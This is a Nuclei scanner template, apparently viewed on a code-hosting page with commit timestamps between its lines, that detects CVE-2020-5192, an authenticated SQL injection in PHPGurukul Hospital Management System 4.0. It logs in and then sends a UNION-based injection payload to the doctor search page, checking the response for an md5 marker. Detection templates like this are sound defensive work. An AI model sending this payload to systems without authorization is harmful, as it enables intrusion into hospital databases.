nuclei-templates/cves/2020/CVE-2020-5192.yaml

54 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2020-5192
2022-08-27 14:19:36 +00:00
info:
2022-08-27 14:19:36 +00:00
name: Hospital Management System 4.0 - SQL Injection
author: TenBird
2022-08-27 14:19:36 +00:00
severity: high
description: |
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
reference:
2022-08-27 14:19:36 +00:00
- https://www.exploit-db.com/exploits/47840
- https://nvd.nist.gov/vuln/detail/CVE-2020-5192
- https://phpgurukul.com/hospital-management-system-in-php/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-5192
cwe-id: CWE-89
2022-08-27 14:19:36 +00:00
metadata:
verified: "true"
tags: cve2020,hms,cms,sqli,authenticated,edb,cve
2022-08-27 14:19:36 +00:00
variables:
num: "999999999"
requests:
- raw:
- |
POST /hospital/hms/doctor/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:19:36 +00:00
username={{username}}password={{password}}&submit=&submit=
2022-08-27 14:19:36 +00:00
- |
POST /hospital/hms/doctor/search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:19:36 +00:00
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
redirects: true
2022-08-27 14:19:36 +00:00
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-30 05:41:12 +00:00
- '{{md5(num)}}'
2022-08-27 14:19:36 +00:00
- type: status
status:
- 200